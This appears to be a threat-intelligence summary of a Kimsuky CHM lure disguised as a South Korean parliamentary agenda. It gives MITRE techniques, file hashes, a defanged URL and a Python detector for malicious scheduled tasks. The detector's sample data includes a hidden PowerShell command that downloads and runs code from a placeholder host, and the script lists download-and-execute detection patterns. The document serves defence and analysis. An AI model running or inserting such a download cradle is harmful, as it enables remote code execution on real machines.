Created by the North Korean hacking group Kimsuky: 240903-회국회(정) 제1차 전체회의 의사일정안 (결산, 안건 상정, 현안 보고) (roughly "240903 first plenary meeting agenda: accounts settlement, tabling of agenda items, current-issue reports"), 2024.8.1

Researchers attribute the sample to the North Korean hacking group Kimsuky, who used a CHM file masquerading as a parliamentary meeting agenda to target South Korean officials and aides. It employs PowerShell to download and execute additional payloads and establishes persistence via scheduled tasks. #Kimsuky #240903

Keypoints

  • The malware is named “240903-회국회(정) 제1차 전체회의 의사일정안”.
  • It is a CHM file that exploits vulnerabilities to execute malicious code.
  • The malware targets South Korean lawmakers and their aides.
  • It uses PowerShell to create scheduled tasks for executing the malware.
  • Security vendors have detected this malware under various names.
  • The article warns about the limitations of antivirus programs in detecting such threats.

MITRE Techniques

  • [T1059.001] PowerShell – “PowerShell commands are executed to download and run malicious files.”
  • [T1053.005] Scheduled Task – “Scheduled tasks are created to ensure the malware runs at specified intervals.”
  • [T1071.001] Web Protocols – “Malware communicates with external servers to receive commands.”
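A defender-side check for the two execution techniques above, added here as an example that is not from the original article or the researchers: it parses Windows Task Scheduler task definitions (the XML shape written into Event ID 4698 "A scheduled task was created") and flags tasks whose action launches PowerShell with a download-and-execute pattern, or whose action runs the Helpstore.exe file name from the IoC list. The three sample tasks and the placeholder host are constructed for this example.

```python
import re
import xml.etree.ElementTree as ET

# Namespace of Task Scheduler task definitions (the TaskContent field of Event ID 4698).
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Argument fragments typical of PowerShell download-and-execute (T1059.001); matched case-insensitively.
SUSPICIOUS_ARGS = [
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer",
    r"\biex\b|invoke-expression",
    r"-e(nc|ncodedcommand)?\s",
    r"-w(indowstyle)?\s+hidden",
    r"https?://",
]
# File name taken from this sample's IoC list; any task launching it is flagged outright.
IOC_FILE_NAMES = {"helpstore.exe"}

def _text(elem, path):
    node = elem.find(path, NS)
    return (node.text or "").strip() if node is not None else ""

def analyse_task(task_xml: str) -> dict:
    """Return the task URI, its Exec action and the reasons (if any) it looks like T1053.005 abuse."""
    root = ET.fromstring(task_xml)
    uri = _text(root, "./t:RegistrationInfo/t:URI")
    command = _text(root, ".//t:Actions/t:Exec/t:Command")
    args = _text(root, ".//t:Actions/t:Exec/t:Arguments")
    exe = command.replace("\\", "/").rsplit("/", 1)[-1].strip('"').lower()
    reasons = []
    if exe in IOC_FILE_NAMES:
        reasons.append(f"action runs IoC file name {exe}")
    if exe in ("powershell.exe", "pwsh.exe"):
        hits = [p for p in SUSPICIOUS_ARGS if re.search(p, args, re.IGNORECASE)]
        if hits:
            reasons.append(f"powershell action with {len(hits)} download/execute indicators")
    return {"uri": uri, "command": command, "arguments": args,
            "suspicious": bool(reasons), "reasons": reasons}

def _task(uri, command, arguments):
    # Minimal task definition, constructed for this example (not captured from the incident).
    return (f'<Task version="1.2" xmlns="{NS["t"]}"><RegistrationInfo><URI>{uri}</URI></RegistrationInfo>'
            f"<Actions><Exec><Command>{command}</Command><Arguments>{arguments}</Arguments></Exec></Actions></Task>")

SAMPLE_TASKS = [  # constructed: one benign task, one PowerShell download cradle, one running the IoC file name
    _task(r"\Microsoft\Windows\Example\Cleanup", r"C:\Windows\System32\cleanmgr.exe", "/autoclean"),
    _task(r"\OneDriveUpdate", "powershell.exe",
          "-w hidden -c \"iex (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/p')\""),
    _task(r"\Helpstore", r"C:\Users\Public\Helpstore.exe", ""),
]

def scan_tasks(task_xmls):
    """Return only the task records that were flagged."""
    return [r for r in (analyse_task(x) for x in task_xmls) if r["suspicious"]]

if __name__ == "__main__":
    for finding in scan_tasks(SAMPLE_TASKS):
        print(finding["uri"], "->", "; ".join(finding["reasons"]))
```

On a live host the same XML is available from Event ID 4698 records or from exported task definitions under the Task Scheduler library.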

Indicators of Compromise

  • [File Name] 240903-회국회(정) 제1차 전체회의 의사일정안(결산,안건 상정,현안 보고).chm – MD5: f5f5a585a12df9cb406dde6b3e6da23d; SHA-1: e7197bb5c5363b56a1e33f333e6613f319458d77; SHA-256: 3e0f4eaf3db754160f8c012a94772bf05b20823806962836fd0d32e0f160b916
  • [File Name] Helpstore.exe – SHA-256: 86ef578ca5923119e65049f3d26bff7ea41cea12f8c425f06786b406c8dfaf9a
  • [File Name] index.html – SHA-256: f00852dab6c6540bb6700d4e6ec43d6b61cd149ac395900b8b9eb5670a0be373
  • [URL] hxxp://checker.jetos.com/l/siCTlD – iframe loads an external URL to fetch additional content/commands (obfuscated in the page)

Read more: https://wezard4u.tistory.com/429252